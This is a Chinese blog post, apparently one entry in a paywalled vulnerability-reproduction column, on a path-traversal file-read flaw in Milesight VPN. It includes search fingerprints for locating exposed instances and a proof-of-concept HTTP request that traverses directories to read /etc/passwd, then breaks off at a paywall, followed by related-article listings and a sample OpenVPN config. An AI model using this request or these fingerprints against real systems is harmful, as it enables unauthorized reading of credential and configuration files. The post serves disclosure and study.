Milesight VPN 任意文件读取漏洞

最新推荐文章于 2024-09-07 19:58:48 发布
最新推荐文章于 2024-09-07 19:58:48 发布
阅读量56 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136605923
版权

漏洞描述

Milesight VPN是中国星纵物联(Milesight)公司的一个基于 Web 的 VPN 监控和管理平台。 Milesight VPN 存在路径遍历漏洞。攻击者利用该漏洞通过特制的网络请求可以读取任意文件,如passwd,数据库配置文件等。

漏洞指纹

body=”glyphicon-remove” && body=”$randdt;” && country=”CN”

“MilesightVPN”

漏洞复现

poc:

读取passwd文件

GET /../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:8001
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v&
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
Ivanti VPN RCE漏洞复现(CVE-2024-21887)
0xSec
01-18 2127
Ivanti Connect Secure (9.x, 22.x) 和Ivanti Policy Secure (9.x, 22.x) 的web组件中存在身份验证绕过漏洞(CVE-2023-46805)和命令注入漏洞(CVE-2024-21887),成功利用该漏洞链允许远程未经认证的攻击者以root权限执行任意操作系统命令,导致服务器失陷。
[漏洞复现]天清汉马vpn任意文件读取漏洞及后利用进内网
LiangYueSec的博客
07-17 2469
[漏洞复现]天清汉马vpn任意文件读取漏洞及后利用进内网
1149357个VPN服务暴露在互联网,几乎都有漏洞
weixin_43408652的博客
08-18 562
OpenVPN是Linux下开源VPN的先锋,同时也能在Mac OSMac OS X与Microsoft Windows以及Android和iOS上运行,也是本次漏洞爆发受影响最大的VPN应用,在全球拥有相当庞大的用户群体,被黑客利用的可能性很大。使用ZoomEye的聚合分析功能对相关“组件”类型进行分析后,我们可以发现VPN使用最多的组件TOP3为:OpenVPN、Cisco ASA SSL VPN、SoftEther VPN Server;随着远程办公的趋势,全球对企业虚拟专用网络的需求正在激增,
启明星辰-天清汉马VPN接口download任意文件读取
weixin_69678131的博客
07-24 715
FOFA:icon_hash="-15980305"app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
Milesight 工业路由器受数十个RCE漏洞影响
smellycat000的专栏
08-04 281
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士思科 Talos 安全研究人员提醒称,数十个漏洞影响Milesight UR32L 工业路由器,可被用于执行任意代码或命令。UR32L 是一款高性价比解决方案,提供 WCDMA 和 4G LTE 支持、以太网端口和远程设备管理能力,适用于大量 M2M/IoT 应用程序。在调查 UR32L 路由器和远程访问解决方案 MilesightVPN 的过程...
2024-HW最新漏洞整理及相应解决方案(八)
m0_72210904的博客
08-08 416
漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
漏洞复现-milesight vpn 任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-17 497
漏洞复现-milesight vpn 任意文件读取漏洞,附带自己写的poc脚本
【1day】复现Milesight-VPNserver.js 任意文件读取漏洞
记录并分享学习安全的知识点..
08-22 369
Milesight路由器-VPN是由Milesight Technology Co., Ltd.开发的一种集成了VPN功能的路由器产品。它旨在为用户提供安全、可靠的远程访问和连接解决方案。Milesight-VPNserver.js存在任意文件读取,攻击者可以通过利用系统中存在的漏洞,获取未经授权的访问权限并读取系统上的任意文件
Milesight VPN server.js 任意文件读取漏洞(CVE-2023-23907)
0xSec
12-15 813
MilesightVPN server.js接口处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
【1day】复现Array Networks VPN系统任意文件读取漏洞
记录并分享学习安全的知识点..
12-05 838
Array Networks VPN 系统是一种用于建立安全连接的网络解决方案。它允许远程用户通过公共网络(如互联网)安全地访问私有网络资源。Array Networks VPN系统存在任意文件读取漏洞,攻击者可以在未经授权的情况下读取系统上的任意文件
HW漏洞威胁情报第三天|HW情报
weixin_43167326的博客
07-25 613
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!天问物业ERP系统ContractDownLoad存在任意文件读取漏洞。猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞。启明星辰天清汉马vpn存在任意文件读取漏洞。赛蓝企业管理系统存在任意文件上传漏洞
Ruijie SSL V P N 垂直越权漏洞
weixin_43526443的博客
03-08 3777
漏洞复现】Ruijie SSL V P N 垂直越权漏洞 目录 【漏洞复现】Ruijie SSL VPN 垂直越权漏洞 1、漏洞简介 2、漏洞影响 3、漏洞复现 4、漏洞批量检测 5、漏洞修复 1、漏洞简介 Ruijie SSL VPN 垂直越权漏洞,攻击者在已知用户名的情况下(默认adm,未知可Burp进行爆破),查看服务器资源,以及对账号进行修改密码和绑定手机操作。 2、漏洞影响 Ruijie SSL VPN 3、漏洞复现 3.1先通过Fofa等方...
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
Zeker62的博客
12-23 4266
漏洞内容 文件读取漏洞概述: 文件读取漏洞就是攻击者利用漏洞,可以越级对服务器端文件其他目录进行访问,以此来达到破坏、越权、获取信息等目的。 本漏洞内容: 思科自适应安全设备 Cisco Adaptive Security Appliance (ASA) 软件和思科火力威胁防御 Cisco Firepower Threat Defense (FTD) 软件的 Web 服务界面中存在漏洞,使得未经身份验证的远程攻击者能够执行目录遍历攻击并读取目标系统上的敏感文件。 简而言之,思科代码对恶意URL的注入过滤
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1657
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1439
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
openvpn2.6.10配置文件
最新发布
09-11
OpenVPN 2.6.10的配置文件通常是一个文本文件,包含了所有连接和操作OpenVPN服务器或客户端的必要指令。这个文件通常有`.conf`扩展名,比如`openvpn.conf`。配置文件的内容涉及到很多方面,比如网络设置、加密选项、认证方式和日志记录等。 下面是一个简化版的OpenVPN配置文件示例: ``` # OpenVPN 配置文件示例 # 使用的协议,可以是 UDP 或 TCP proto udp # 服务器的IP地址或域名,如果是客户端则不需要 remote my-server-1 1194 # 指定本地服务器使用的IP地址和端口 # 如果是客户端则用 remote directives 指定服务器 # local my-server-1 # 指定密钥的本地路径,用于认证 ca ca.crt cert client.crt key client.key # 指定加密算法 cipher AES-256-CBC # 启用压缩 comp-lzo # 如果是客户端,需要指定服务器的证书名称 # remote-cert-tls server # 保持连接的时间间隔 keepalive 10 120 # 最大传输单元 mtu-test # 日志记录级别 log /var/log/openvpn.log # 允许重复的IP地址 duplicate-cn # 在指定的用户和组下启动OpenVPN进程 user nobody group nogroup # 指定脚本文件来执行特定任务,如路由设置 # up /etc/openvpn/update-resolv-conf # down /etc/openvpn/update-resolv-conf # 隐藏的选项 # 隐藏隧道的客户端真实IP地址 # client-bridge 10.8.0.4 255.255.255.0 10.8.0.5 10.8.0.6 ``` 在实际部署中,你需要根据自己的需求来调整配置文件中的参数。比如服务器的IP地址、端口、密钥和证书的路径、加密算法等等。配置文件对于OpenVPN安全性和连接性能都有很大影响。 请确保在修改配置文件之前了解每一项设置的作用,并且根据自己的环境进行适当的配置。错误的配置可能导致连接不稳定或者无法连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值